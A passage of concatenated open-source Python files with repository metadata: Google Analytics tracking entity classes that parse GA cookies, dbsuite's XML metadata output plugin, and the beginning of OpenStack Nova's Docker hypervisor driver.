creation_time -- Time of the creation of this campaign, will be mapped to "__utmz" parameter.
response_count -- Response Count, will be mapped to "__utmz" parameter.
Is also used to determine whether the campaign is new or repeated,
which will be mapped to "utmcn" and "utmcr" parameters.
id -- Campaign ID, a.k.a. "utm_id" query parameter for ga.js
Will be mapped to "__utmz" parameter.
source -- Source, a.k.a. "utm_source" query parameter for ga.js.
Will be mapped to "utmcsr" key in "__utmz" parameter.
g_click_id -- Google AdWords Click ID, a.k.a. "gclid" query parameter for ga.js.
Will be mapped to "utmgclid" key in "__utmz" parameter.
d_click_id -- DoubleClick (?) Click ID. Will be mapped to "utmdclid" key in "__utmz" parameter.
name -- Name, a.k.a. "utm_campaign" query parameter for ga.js.
Will be mapped to "utmccn" key in "__utmz" parameter.
medium -- Medium, a.k.a. "utm_medium" query parameter for ga.js.
Will be mapped to "utmcmd" key in "__utmz" parameter.
term -- Terms/Keywords, a.k.a. "utm_term" query parameter for ga.js.
Will be mapped to "utmctr" key in "__utmz" parameter.
content -- Ad Content Description, a.k.a. "utm_content" query parameter for ga.js.
Will be mapped to "utmcct" key in "__utmz" parameter.
'''
TYPE_DIRECT = 'direct'
TYPE_ORGANIC = 'organic'
TYPE_REFERRAL = 'referral'
CAMPAIGN_DELIMITER = '|'
UTMZ_PARAM_MAP = {
'utmcid': 'id',
'utmcsr': 'source',
'utmgclid': 'g_click_id',
'utmdclid': 'd_click_id',
'utmccn': 'name',
'utmcmd': 'medium',
'utmctr': 'term',
'utmcct': 'content',
}
def __init__(self, typ):
self._type = None
self.creation_time = None
self.response_count = 0
self.id = None
self.source = None
self.g_click_id = None
self.d_click_id = None
self.name = None
self.medium = None
self.term = None
self.content = None
if typ:
if typ not in ('direct', 'organic', 'referral'):
raise ValueError('Campaign type has to be one of the Campaign::TYPE_* constant values.')
self._type = typ
if typ == Campaign.TYPE_DIRECT:
self.name = '(direct)'
self.source = '(direct)'
self.medium = '(none)'
elif typ == Campaign.TYPE_REFERRAL:
self.name = '(referral)'
self.medium = 'referral'
elif typ == Campaign.TYPE_ORGANIC:
self.name = '(organic)'
self.medium = 'organic'
else:
self._type = None
self.creation_time = datetime.utcnow()
def validate(self):
if not self.source:
raise exceptions.ValidationError('Campaigns need to have at least the "source" attribute defined.')
@staticmethod
def create_from_referrer(url):
obj = Campaign(Campaign.TYPE_REFERRAL)
parse_rslt = urlparse(url)
obj.source = parse_rslt.netloc
obj.content = parse_rslt.path
return obj
def extract_from_utmz(self, utmz):
parts = utmz.split('.', 4)
if len(parts) != 5:
raise ValueError('The given "__utmz" cookie value is invalid.')
self.creation_time = utils.convert_ga_timestamp(parts[1])
self.response_count = int(parts[3])
params = parts[4].split(Campaign.CAMPAIGN_DELIMITER)
for param in params:
key, val = param.split('=')
try:
setattr(self, self.UTMZ_PARAM_MAP[key], unquote_plus(val))
except KeyError:
continue
return self
class CustomVariable(object):
'''
Represent a Custom Variable
Properties:
index -- Is the slot, you have 5 slots
name -- Name given to custom variable
value -- Value for the variable
scope -- Scope can be any one of 1, 2 or 3.
WATCH OUT: It's a known issue that GA will not decode URL-encoded
characters in custom variable names and values properly, so spaces
will show up as "%20" in the interface etc. (applicable to name & value)
http://www.google.com/support/forum/p/Google%20Analytics/thread?tid=2cdb3ec0be32e078
'''
SCOPE_VISITOR = 1
SCOPE_SESSION = 2
SCOPE_PAGE = 3
def __init__(self, index=None, name=None, value=None, scope=3):
self.index = index
self.name = name
self.value = value
self.scope = CustomVariable.SCOPE_PAGE
if scope:
self.scope = scope
def __setattr__(self, name, value):
if name == 'scope':
if value and value not in range(1, 4):
raise ValueError('Custom Variable scope has to be one of the 1,2 or 3')
if name == 'index':
# Custom Variables are limited to five slots officially, but there seems to be a
# trick to allow for more of them which we could investigate at a later time (see
# http://analyticsimpact.com/2010/05/24/get-more-than-5-custom-variables-in-google-analytics/
if value and (value < 0 or value > 5):
raise ValueError('Custom Variable index has to be between 1 and 5.')
object.__setattr__(self, name, value)
def validate(self):
'''
According to the GA documentation, there is a limit to the combined size of
name and value of 64 bytes after URL encoding,
see http://code.google.com/apis/analytics/docs/tracking/gaTrackingCustomVariables.html#varTypes
and http://xahlee.org/js/google_analytics_tracker_2010-07-01_expanded.js line 563
This limit was increased to 128 bytes BEFORE encoding with the 2012-01 release of ga.js however,
see http://code.google.com/apis/analytics/community/gajs_changelog.html
'''
if len('%s%s' % (self.name, self.value)) > 128:
raise exceptions.ValidationError('Custom Variable combined name and value length must not be larger than 128 bytes.')
class Event(object):
'''
Represents an Event
http://code.google.com/apis/analytics/docs/tracking/eventTrackerOverview.html
Properties:
category -- The general event category
action -- The action for the event
label -- An optional descriptor for the event
value -- An optional value associated with the event. You can see your
event values in the Overview, Categories, and Actions reports,
where they are listed by event or aggregated across events,
depending upon your report view.
noninteraction -- By default, event hits will impact a visitor's bounce rate.
By setting this parameter to true, this event hit
will not be used in bounce rate calculations.
(default False)
'''
def __init__(self, category=None, action=None, label=None, value=None, noninteraction=False):
self.category = category
self.action = action
self.label = label
self.value = value
self.noninteraction = bool(noninteraction)
if self.noninteraction and not self.value:
self.value = 0
def validate(self):
if not(self.category and self.action):
raise exceptions.ValidationError('Events, at least need to have a category and action defined.')
class Item(object):
'''
Represents an Item in Transaction
Properties:
order_id -- Order ID, will be mapped to "utmtid" parameter
sku -- Product Code. This is the sku code for a given product, will be mapped to "utmipc" parameter
name -- Product Name, will be mapped to "utmipn" parameter
variation -- Variations on an item, will be mapped to "utmiva" parameter
price -- Unit Price. Value is set to numbers only, will be mapped to "utmipr" parameter
quantity -- Unit Quantity, will be mapped to "utmiqt" parameter
'''
def __init__(self):
self.order_id = None
self.sku = None
self.name = None
self.variation = None
self.price = None
self.quantity = 1
def validate(self):
if not self.sku:
raise exceptions.ValidationError('sku/product is a required parameter')
class Page(object):
'''
Contains all parameters needed for tracking a page
Properties:
path -- Page request URI, will be mapped to "utmp" parameter
title -- Page title, will be mapped to "utmdt" parameter
charset -- Charset encoding, will be mapped to "utmcs" parameter
referrer -- Referer URL, will be mapped to "utmr" parameter
load_time -- Page load time in milliseconds, will be encoded into "utme" parameter.
'''
REFERRER_INTERNAL = '0'
def __init__(self, path):
self.path = None
self.title = None
self.charset = None
self.referrer = None
self.load_time = None
if path:
self.path = path
def __setattr__(self, name, value):
if name == 'path':
if value and value != '':
if value[0] != '/':
raise ValueError('The page path should always start with a slash ("/").')
elif name == 'load_time':
if value and not isinstance(value, int):
raise ValueError('Page load time must be specified in integer milliseconds.')
object.__setattr__(self, name, value)
class Session(object):
'''
You should serialize this object and store it in the user session to keep it
persistent between requests (similar to the "__umtb" cookie of the GA Javascript client).
Properties:
session_id -- A unique per-session ID, will be mapped to "utmhid" parameter
track_count -- The amount of pageviews that were tracked within this session so far,
will be part of the "__utmb" cookie parameter.
Will get incremented automatically upon each request
start_time -- Timestamp of the start of this new session, will be part of the "__utmb" cookie parameter
'''
def __init__(self):
self.session_id = utils.get_32bit_random_num()
self.track_count = 0
self.start_time = datetime.utcnow()
@staticmethod
def generate_session_id():
return utils.get_32bit_random_num()
def extract_from_utmb(self, utmb):
'''
Will extract information for the "trackCount" and "startTime"
properties from the given "__utmb" cookie value.
'''
parts = utmb.split('.')
if len(parts) != 4:
raise ValueError('The given "__utmb" cookie value is invalid.')
self.track_count = int(parts[1])
self.start_time = utils.convert_ga_timestamp(parts[3])
return self
class SocialInteraction(object):
'''
Properties:
action -- Required. A string representing the social action being tracked,
will be mapped to "utmsa" parameter
network -- Required. A string representing the social network being tracked,
will be mapped to "utmsn" parameter
target -- Optional. A string representing the URL (or resource) which receives the action.
'''
def __init__(self, action=None, network=None, target=None):
self.action = action
self.network = network
self.target = target
def validate(self):
if not(self.action and self.network):
raise exceptions.ValidationError('Social interactions need to have at least the "network" and "action" attributes defined.')
class Transaction(object):
'''
Represents parameters for a Transaction call
Properties:
order_id -- Order ID, will be mapped to "utmtid" parameter
affiliation -- Affiliation, Will be mapped to "utmtst" parameter
total -- Total Cost, will be mapped to "utmtto" parameter
tax -- Tax Cost, will be mapped to "utmttx" parameter
shipping -- Shipping Cost, values as for unit and price, will be mapped to "utmtsp" parameter
city -- Billing City, will be mapped to "utmtci" parameter
state -- Billing Region, will be mapped to "utmtrg" parameter
country -- Billing Country, will be mapped to "utmtco" parameter
items -- @entity.Items in a transaction
'''
def __init__(self):
self.items = []
self.order_id = None
self.affiliation = None
self.total = None
self.tax = None
self.shipping = None
self.city = None
self.state = None
self.country = None
def __setattr__(self, name, value):
if name == 'order_id':
for itm in self.items:
itm.order_id = value
object.__setattr__(self, name, value)
def validate(self):
if len(self.items) == 0:
raise exceptions.ValidationError('Transaction need to consist of at least one item')
def add_item(self, item):
''' item of type entities.Item '''
if isinstance(item, Item):
item.order_id = self.order_id
self.items.append(item)
class Visitor(object):
'''
You should serialize this object and store it in the user database to keep it
persistent for the same user permanently (similar to the "__umta" cookie of
the GA Javascript client).
Properties:
unique_id -- Unique user ID, will be part of the "__utma" cookie parameter
first_visit_time -- Time of the very first visit of this user, will be part of the "__utma" cookie parameter
previous_visit_time -- Time of the previous visit of this user, will be part of the "__utma" cookie parameter
current_visit_time -- Time of the current visit of this user, will be part of the "__utma" cookie parameter
visit_count -- Amount of total visits by this user, will be part of the "__utma" cookie parameter
ip_address -- IP Address of the end user, will be mapped to "utmip" parameter and "X-Forwarded-For" request header
user_agent -- User agent string of the end user, will be mapped to "User-Agent" request header
locale -- Locale string (country part optional) will be mapped to "utmul" parameter
flash_version -- Visitor's Flash version, will be maped to "utmfl" parameter
java_enabled -- Visitor's Java support, will be mapped to "utmje" parameter
screen_colour_depth -- Visitor's screen color depth, will be mapped to "utmsc" parameter
screen_resolution -- Visitor's screen resolution, will be mapped to "utmsr" parameter
'''
def __init__(self):
now = datetime.utcnow()
self.unique_id = None
self.first_visit_time = now
self.previous_visit_time = now
self.current_visit_time = now
self.visit_count = 1
self.ip_address = None
self.user_agent = None
self.locale = None
self.flash_version = None
self.java_enabled = None
self.screen_colour_depth = None
self.screen_resolution = None
def __setattr__(self, name, value):
if name == 'unique_id':
if value and value < 0 or value > 0x7fffffff:
raise ValueError('Visitor unique ID has to be a 32-bit integer between 0 and 0x7fffffff')
object.__setattr__(self, name, value)
def __getattribute__(self, name):
if name == 'unique_id':
tmp = object.__getattribute__(self, name)
if tmp is None:
self.unique_id = self.generate_unique_id()
return object.__getattribute__(self, name)
def __getstate__(self):
state = self.__dict__
if state.get('user_agent') is None:
state['unique_id'] = self.generate_unique_id()
return state
def extract_from_utma(self, utma):
'''
Will extract information for the "unique_id", "first_visit_time", "previous_visit_time",
"current_visit_time" and "visit_count" properties from the given "__utma" cookie value.
'''
parts = utma.split('.')
if len(parts) != 6:
raise ValueError('The given "__utma" cookie value is invalid.')
self.unique_id = int(parts[1])
self.first_visit_time = utils.convert_ga_timestamp(parts[2])
self.previous_visit_time = utils.convert_ga_timestamp(parts[3])
self.current_visit_time = utils.convert_ga_timestamp(parts[4])
self.visit_count = int(parts[5])
return self
def extract_from_server_meta(self, meta):
'''
Will extract information for the "ip_address", "user_agent" and "locale"
properties from the given WSGI REQUEST META variable or equivalent.
'''
if 'REMOTE_ADDR' in meta and meta['REMOTE_ADDR']:
ip = None
for key in ('HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'):
if key in meta and not ip:
ips = meta.get(key, '').split(',')
ip = ips[len(ips) - 1].strip()
if not utils.is_valid_ip(ip):
ip = ''
if utils.is_private_ip(ip):
ip = ''
if ip:
self.ip_address = ip
if 'HTTP_USER_AGENT' in meta and meta['HTTP_USER_AGENT']:
self.user_agent = meta['HTTP_USER_AGENT']
if 'HTTP_ACCEPT_LANGUAGE' in meta and meta['HTTP_ACCEPT_LANGUAGE']:
user_locals = []
matched_locales = utils.validate_locale(meta['HTTP_ACCEPT_LANGUAGE'])
if matched_locales:
lang_lst = map((lambda x: x.replace('-', '_')), (i[1] for i in matched_locales))
quality_lst = map((lambda x: x and x or 1), (float(i[4] and i[4] or '0') for i in matched_locales))
lang_quality_map = map((lambda x, y: (x, y)), lang_lst, quality_lst)
user_locals = [x[0] for x in sorted(lang_quality_map, key=itemgetter(1), reverse=True)]
if user_locals:
self.locale = user_locals[0]
return self
def generate_hash(self):
'''Generates a hashed value from user-specific properties.'''
tmpstr = "%s%s%s" % (self.user_agent, self.screen_resolution, self.screen_colour_depth)
return utils.generate_hash(tmpstr)
def generate_unique_id(self):
'''Generates a unique user ID from the current user-specific properties.'''
return ((utils.get_32bit_random_num() ^ self.generate_hash()) & 0x7fffffff)
def add_session(self, session):
'''
Updates the "previousVisitTime", "currentVisitTime" and "visitCount"
fields based on the given session object.
'''
start_time = session.start_time
if start_time != self.current_visit_time:
self.previous_visit_time = self.current_visit_time
self.current_visit_time = start_time
self.visit_count = self.visit_count + 1
| gpl-3.0 |
waveform80/dbsuite | dbsuite/plugins/xml/output/__init__.py | 1 | 21257 | # vim: set et sw=4 sts=4:
# Copyright 2012 Dave Hughes.
#
# This file is part of dbsuite.
#
# dbsuite is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# dbsuite is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# dbsuite. If not, see <http://www.gnu.org/licenses/>.
"""Output plugin for XML metadata storage."""
from __future__ import (
unicode_literals,
print_function,
absolute_import,
division,
)
import re
import logging
from string import Template
import dbsuite.plugins
from dbsuite.etree import (
fromstring, tostring, indent, Element, SubElement, CDATA
)
from dbsuite.db import (
Database, Schema, Datatype, Table, View, Alias, Field, UniqueKey,
PrimaryKey, ForeignKey, Check, Index, Trigger, Function, Procedure,
Param, Tablespace
)
class OutputPlugin(dbsuite.plugins.OutputPlugin):
"""Output plugin for metadata storage (in XML format).
This output plugin writes all database metadata into an XML file. This is
intended for use in conjunction with the xml.input plugin, if you want
metadata extraction and document creation to be performed separately (on
separate machines or at separate times), or if you wish to use db2makedoc
to provide metadata in a transportable format for some other application.
The DTD of the output is not fully documented at the present time. The best
way to learn it is to try the plugin with a database and check the result
(which can be indented for human consumption; see the indent parameter).
"""
def __init__(self):
"""Initializes an instance of the class."""
super(OutputPlugin, self).__init__()
self.add_option('filename', default=None, convert=self.convert_path,
doc="""The path and filename for the XML output file. Use $db or
${db} to include the name of the database in the filename. The
$dblower and $dbupper substitutions are also available, for forced
lowercase and uppercase versions of the name respectively. To
include a literal $, use $$""")
self.add_option('encoding', default='UTF-8',
doc="""The character encoding to use for the XML output file (optional)""")
self.add_option('indent', default=True, convert=self.convert_bool,
doc="""If true (the default), the XML will be indented for human readbility""")
def configure(self, config):
super(OutputPlugin, self).configure(config)
# Ensure we can find the specified encoding
''.encode(self.options['encoding'])
# Ensure the filename was specified
if not self.options['filename']:
raise dbsuite.plugins.PluginConfigurationError('The filename option must be specified')
def execute(self, database):
super(OutputPlugin, self).execute(database)
# Translate any templates in the filename option now that we've got the
# database
if not 'filename_template' in self.options:
self.options['filename_template'] = Template(self.options['filename'])
self.options['filename'] = self.options['filename_template'].safe_substitute({
'db': database.name,
'dblower': database.name.lower(),
'dbupper': database.name.upper(),
})
# Construct a dictionary mapping database objects to XML elements
# representing those objects
logging.debug('Constructing elements')
self.elements = {}
for db_object in database:
self.make_element(db_object)
# Stitch together the XML tree by adding each element to its parent
logging.debug('Constructing element hierarchy')
for db_object, element in self.elements.iteritems():
if db_object.parent:
parent = self.elements[db_object.parent]
parent.append(element)
# Find the root document element, convert the document to a string with
# an appropriate XML PI
logging.debug('Converting output')
root = self.elements[database]
if self.options['indent']:
indent(root)
s = unicode(tostring(root))
s = '<?xml version="1.0" encoding="%s"?>\n%s' % (self.options['encoding'], s)
# Check there aren't any silly characters (control characters / binary)
# lurking in the unicode version. Most codecs will blindly pass these
# through but they're invalid in XML
s = re.sub(r'[\x00-\x08\x0B\x0C\x0E-\x1F]+', lambda m: '?'*len(m.group()), s)
s = s.encode(self.options['encoding'])
# Finally, write the document to disk
logging.info('Writing output to "%s"' % self.options['filename'])
f = open(self.options['filename'], 'w')
try:
f.write(s)
finally:
f.close()
def make_element(self, db_object):
logging.debug('Constructing element for %s' % db_object.identifier)
self.elements[db_object] = {
Database: self.make_database,
Schema: self.make_schema,
Datatype: self.make_datatype,
Table: self.make_table,
View: self.make_view,
Alias: self.make_alias,
Field: self.make_field,
UniqueKey: self.make_unique_key,
PrimaryKey: self.make_primary_key,
ForeignKey: self.make_foreign_key,
Check: self.make_check,
Index: self.make_index,
Trigger: self.make_trigger,
Function: self.make_function,
Procedure: self.make_procedure,
Param: self.make_param,
Tablespace: self.make_tablespace,
}[type(db_object)](db_object)
def make_database(self, database):
result = Element('database')
result.attrib['id'] = database.identifier
result.attrib['name'] = database.name
return result
def make_schema(self, schema):
result = Element('schema')
result.attrib['id'] = schema.identifier
result.attrib['name'] = schema.name
if schema.owner:
result.attrib['owner'] = schema.owner
if schema.system:
result.attrib['system'] = 'system'
if schema.created:
result.attrib['created'] = schema.created.isoformat()
if schema.description:
SubElement(result, 'description').text = schema.description
return result
def make_datatype(self, datatype):
result = Element('datatype')
result.attrib['id'] = datatype.identifier
result.attrib['name'] = datatype.name
if datatype.owner:
result.attrib['owner'] = datatype.owner
if datatype.system:
result.attrib['system'] = 'system'
if datatype.created:
result.attrib['created'] = datatype.created.isoformat()
if datatype.variable_size:
result.attrib['variable'] = ['size', 'scale'][datatype.variable_scale]
if datatype.source:
result.attrib['source'] = datatype.source.identifier
if datatype.source.variable_size:
result.attrib['size'] = str(datatype.size)
if datatype.source.variable_scale:
result.attrib['scale'] = str(datatype.scale)
if datatype.description:
SubElement(result, 'description').text = datatype.description
return result
def make_table(self, table):
result = Element('table')
result.attrib['id'] = table.identifier
result.attrib['name'] = table.name
result.attrib['tablespace'] = table.tablespace.identifier
if table.owner:
result.attrib['owner'] = table.owner
if table.system:
result.attrib['system'] = 'system'
if table.created:
result.attrib['created'] = table.created.isoformat()
if table.last_stats:
result.attrib['laststats'] = table.last_stats.isoformat()
if table.cardinality:
result.attrib['cardinality'] = str(table.cardinality)
if table.size:
result.attrib['size'] = str(table.size)
if table.description:
SubElement(result, 'description').text = table.description
# XXX Add reverse dependencies?
# XXX Add associated triggers?
# XXX Add creation SQL?
return result
def make_view(self, view):
result = Element('view')
result.attrib['id'] = view.identifier
result.attrib['name'] = view.name
if view.owner:
result.attrib['owner'] = view.owner
if view.system:
result.attrib['system'] = 'system'
if view.created:
result.attrib['created'] = view.created.isoformat()
if view.read_only:
result.attrib['readonly'] = 'readonly'
if view.description:
SubElement(result, 'description').text = view.description
SubElement(result, 'sql').append(CDATA(view.sql))
for dependency in view.dependency_list:
SubElement(result, 'viewdep').attrib['ref'] = dependency.identifier
return result
def make_alias(self, alias):
result = Element('alias')
result.attrib['id'] = alias.identifier
result.attrib['name'] = alias.name
result.attrib['relation'] = alias.relation.identifier
if alias.owner:
result.attrib['owner'] = alias.owner
if alias.system:
result.attrib['system'] = 'system'
if alias.created:
result.attrib['created'] = alias.created.isoformat()
if alias.description:
SubElement(result, 'description').text = alias.description
# XXX Add creation SQL?
return result
def make_field(self, field):
result = Element('field')
result.attrib['id'] = field.identifier
result.attrib['name'] = field.name
result.attrib['position'] = str(field.position)
result.attrib['datatype'] = field.datatype.identifier
if field.datatype.variable_size:
result.attrib['size'] = str(field.size)
if field.datatype.variable_scale:
result.attrib['scale'] = str(field.scale)
if field.codepage:
result.attrib['codepage'] = str(field.codepage)
if field.nullable:
result.attrib['nullable'] = 'nullable'
if field.null_cardinality:
result.attrib['null_cardinality'] = str(field.null_cardinality)
if field.cardinality:
result.attrib['cardinality'] = str(field.cardinality)
if field.identity:
result.attrib['identity'] = 'identity'
if field.generated == 'N':
if field.default:
result.attrib['default'] = field.default
else:
result.attrib['generated'] = {
'A': 'always',
'D': 'default',
}[field.generated]
if field.default:
result.attrib['expression'] = field.default
if field.description:
SubElement(result, 'description').text = field.description
# XXX Add key position?
# XXX Add creation SQL?
return result
def make_unique_key(self, key):
result = Element('uniquekey')
result.attrib['id'] = key.identifier
result.attrib['name'] = key.name
if key.owner:
result.attrib['owner'] = key.owner
if key.system:
result.attrib['system'] = 'system'
if key.created:
result.attrib['created'] = key.created.isoformat()
if key.description:
SubElement(result, 'description').text = key.description
for field in key.fields:
SubElement(result, 'keyfield').attrib['ref'] = field.identifier
# XXX Include parent keys?
return result
def make_primary_key(self, key):
result = self.make_unique_key(key)
result.tag = 'primarykey'
return result
def make_foreign_key(self, key):
action_map = {
'A': 'noaction',
'C': 'cascade',
'N': 'setnull',
'R': 'restrict',
}
result = Element('foreignkey')
result.attrib['id'] = key.identifier
result.attrib['name'] = key.name
result.attrib['ondelete'] = action_map[key.delete_rule]
result.attrib['onupdate'] = action_map[key.update_rule]
result.attrib['references'] = key.ref_key.identifier
if key.owner:
result.attrib['owner'] = key.owner
if key.system:
result.attrib['system'] = 'system'
if key.created:
result.attrib['created'] = key.created.isoformat()
if key.description:
SubElement(result, 'description').text = key.description
for (field, parent) in key.fields:
e = SubElement(result, 'fkeyfield')
e.attrib['sourceref'] = field.identifier
e.attrib['targetref'] = parent.identifier
return result
def make_check(self, check):
result = Element('check')
result.attrib['id'] = check.identifier
result.attrib['name'] = check.name
if check.owner:
result.attrib['owner'] = check.owner
if check.system:
result.attrib['system'] = 'system'
if check.created:
result.attrib['created'] = check.created.isoformat()
if check.description:
SubElement(result, 'description').text = check.description
if check.expression:
SubElement(result, 'expression').text = check.expression
for field in check.fields:
SubElement(result, 'checkfield').attrib['ref'] = field.identifier
return result
def make_index(self, index):
result = Element('index')
result.attrib['id'] = index.identifier
result.attrib['name'] = index.name
result.attrib['table'] = index.table.identifier
result.attrib['tablespace'] = index.tablespace.identifier
if index.owner:
result.attrib['owner'] = index.owner
if index.system:
result.attrib['system'] = 'system'
if index.created:
result.attrib['created'] = index.created.isoformat()
if index.last_stats:
result.attrib['laststats'] = index.last_stats.isoformat()
if index.cardinality:
result.attrib['cardinality'] = str(index.cardinality)
if index.size:
result.attrib['size'] = str(index.size)
if index.unique:
result.attrib['unique'] = 'unique'
if index.description:
SubElement(result, 'description').text = index.description
for (field, order) in index.field_list:
e = SubElement(result, 'indexfield')
e.attrib['ref'] = field.identifier
e.attrib['order'] = {
'A': 'asc',
'D': 'desc',
'I': 'include',
}[order]
# XXX Add creation SQL?
return result
def make_trigger(self, trigger):
result = Element('trigger')
result.attrib['id'] = trigger.identifier
result.attrib['name'] = trigger.name
result.attrib['relation'] = trigger.relation.identifier
result.attrib['time'] = {
'A': 'after',
'B': 'before',
'I': 'instead',
}[trigger.trigger_time]
result.attrib['event'] = {
'I': 'insert',
'U': 'update',
'D': 'delete',
}[trigger.trigger_event]
result.attrib['granularity'] = {
'R': 'row',
'S': 'statement',
}[trigger.granularity]
if trigger.owner:
result.attrib['owner'] = trigger.owner
if trigger.system:
result.attrib['system'] = 'system'
if trigger.created:
result.attrib['created'] = trigger.created.isoformat()
if trigger.description:
SubElement(result, 'description').text = trigger.description
if trigger.sql:
SubElement(result, 'sql').append(CDATA(trigger.sql))
for dependency in trigger.dependency_list:
SubElement(result, 'trigdep').attrib['ref'] = dependency.identifier
return result
def make_function(self, function):
result = Element('function')
result.attrib['id'] = function.identifier
result.attrib['name'] = function.name
result.attrib['specificname'] = function.specific_name
result.attrib['type'] = {
'C': 'column',
'R': 'row',
'T': 'table',
'S': 'scalar',
}[function.type]
result.attrib['access'] = {
None: 'none',
'N': 'none',
'C': 'contains',
'R': 'reads',
'M': 'modifies',
}[function.sql_access]
if function.owner:
result.attrib['owner'] = function.owner
if function.system:
result.attrib['system'] = 'system'
if function.created:
result.attrib['created'] = function.created.isoformat()
if function.deterministic:
result.attrib['deterministic'] = 'deterministic'
if function.external_action:
result.attrib['externalaction'] = 'externalaction'
if function.null_call:
result.attrib['nullcall'] = 'nullcall'
if function.description:
SubElement(result, 'description').text = function.description
if function.sql:
SubElement(result, 'sql').append(CDATA(function.sql))
return result
def make_procedure(self, procedure):
result = Element('procedure')
result.attrib['id'] = procedure.identifier
result.attrib['name'] = procedure.name
result.attrib['specificname'] = procedure.specific_name
result.attrib['access'] = {
None: 'none',
'N': 'none',
'C': 'contains',
'R': 'reads',
'M': 'modifies',
}[procedure.sql_access]
if procedure.owner:
result.attrib['owner'] = procedure.owner
if procedure.system:
result.attrib['system'] = 'system'
if procedure.created:
result.attrib['created'] = procedure.created.isoformat()
if procedure.deterministic:
result.attrib['deterministic'] = 'deterministic'
if procedure.external_action:
result.attrib['externalaction'] = 'externalaction'
if procedure.null_call:
result.attrib['nullcall'] = 'nullcall'
if procedure.description:
SubElement(result, 'description').text = procedure.description
if procedure.sql:
SubElement(result, 'sql').append(CDATA(procedure.sql))
return result
def make_param(self, param):
result = Element('parameter')
result.attrib['id'] = param.identifier
result.attrib['name'] = param.name
result.attrib['type'] = {
'I': 'in',
'O': 'out',
'B': 'inout',
'R': 'return',
}[param.type]
result.attrib['position'] = str(param.position)
result.attrib['datatype'] = param.datatype.identifier
if param.datatype.variable_size:
if param.size is not None:
result.attrib['size'] = str(param.size)
if param.datatype.variable_scale:
if param.scale is not None:
result.attrib['scale'] = str(param.scale)
if param.codepage:
result.attrib['codepage'] = str(param.codepage)
if param.description:
SubElement(result, 'description').text = param.description
return result
def make_tablespace(self, tablespace):
result = Element('tablespace')
result.attrib['id'] = tablespace.identifier
result.attrib['name'] = tablespace.name
result.attrib['type'] = tablespace.type
if tablespace.owner:
result.attrib['owner'] = tablespace.owner
if tablespace.system:
result.attrib['system'] = 'system'
if tablespace.created:
result.attrib['created'] = tablespace.created.isoformat()
if tablespace.description:
SubElement(result, 'description').text = tablespace.description
# XXX Include table and index lists?
#for table in tablespace.table_list:
# SubElement(result, 'containstable').attrib['ref'] = table.identifier
#for index in tablespace.index_list:
# SubElement(result, 'containsindex').attrib['ref'] = index.identifier
return result
| gpl-3.0 |
TieWei/nova | nova/virt/docker/driver.py | 4 | 15419 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2013 dotCloud, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A Docker Hypervisor which allows running Linux Containers instead of VMs.
"""
import os
import random
import socket
import time
from oslo.config import cfg
from nova.compute import power_state
from nova.compute import task_states
from nova import exception
from nova.image import glance
from nova.openstack.common.gettextutils import _
from nova.openstack.common import jsonutils
from nova.openstack.common import log
from nova import utils
import nova.virt.docker.client
from nova.virt.docker import hostinfo
from nova.virt import driver
docker_opts = [
cfg.IntOpt('docker_registry_default_port',
default=5042,
help=_('Default TCP port to find the '
'docker-registry container')),
]
CONF = cfg.CONF
CONF.register_opts(docker_opts)
CONF.import_opt('my_ip', 'nova.netconf')
LOG = log.getLogger(__name__)
class DockerDriver(driver.ComputeDriver):
"""Docker hypervisor driver."""
capabilities = {
'has_imagecache': True,
'supports_recreate': True,
}
def __init__(self, virtapi):
super(DockerDriver, self).__init__(virtapi)
self._docker = None
@property
def docker(self):
if self._docker is None:
self._docker = nova.virt.docker.client.DockerHTTPClient()
return self._docker
def init_host(self, host):
if self.is_daemon_running() is False:
raise exception.NovaException(_('Docker daemon is not running or '
'is not reachable (check the rights on /var/run/docker.sock)'))
def is_daemon_running(self):
try:
self.docker.list_containers()
return True
except socket.error:
# NOTE(samalba): If the daemon is not running, we'll get a socket
# error. The list_containers call is safe to call often, there
# is an internal hard limit in docker if the amount of containers
# is huge.
return False
def list_instances(self, inspect=False):
res = []
for container in self.docker.list_containers():
info = self.docker.inspect_container(container['id'])
if inspect:
res.append(info)
else:
res.append(info['Config'].get('Hostname'))
return res
def plug_vifs(self, instance, network_info):
"""Plug VIFs into networks."""
pass
def unplug_vifs(self, instance, network_info):
"""Unplug VIFs from networks."""
pass
def find_container_by_name(self, name):
for info in self.list_instances(inspect=True):
if info['Config'].get('Hostname') == name:
return info
return {}
def get_info(self, instance):
container = self.find_container_by_name(instance['name'])
if not container:
raise exception.InstanceNotFound(instance_id=instance['name'])
running = container['State'].get('Running')
info = {
'max_mem': 0,
'mem': 0,
'num_cpu': 1,
'cpu_time': 0
}
info['state'] = power_state.RUNNING if running \
else power_state.SHUTDOWN
return info
def get_host_stats(self, refresh=False):
hostname = socket.gethostname()
memory = hostinfo.get_memory_usage()
disk = hostinfo.get_disk_usage()
stats = self.get_available_resource(hostname)
stats['hypervisor_hostname'] = stats['hypervisor_hostname']
stats['host_hostname'] = stats['hypervisor_hostname']
stats['host_name_label'] = stats['hypervisor_hostname']
return stats
def get_available_resource(self, nodename):
if not hasattr(self, '_nodename'):
self._nodename = nodename
if nodename != self._nodename:
LOG.error(_('Hostname has changed from %(old)s to %(new)s. '
'A restart is required to take effect.'
) % {'old': self._nodename,
'new': nodename})
memory = hostinfo.get_memory_usage()
disk = hostinfo.get_disk_usage()
stats = {
'vcpus': 1,
'vcpus_used': 0,
'memory_mb': memory['total'] / (1024 ** 2),
'memory_mb_used': memory['used'] / (1024 ** 2),
'local_gb': disk['total'] / (1024 ** 3),
'local_gb_used': disk['used'] / (1024 ** 3),
'disk_available_least': disk['available'] / (1024 ** 3),
'hypervisor_type': 'docker',
'hypervisor_version': '1.0',
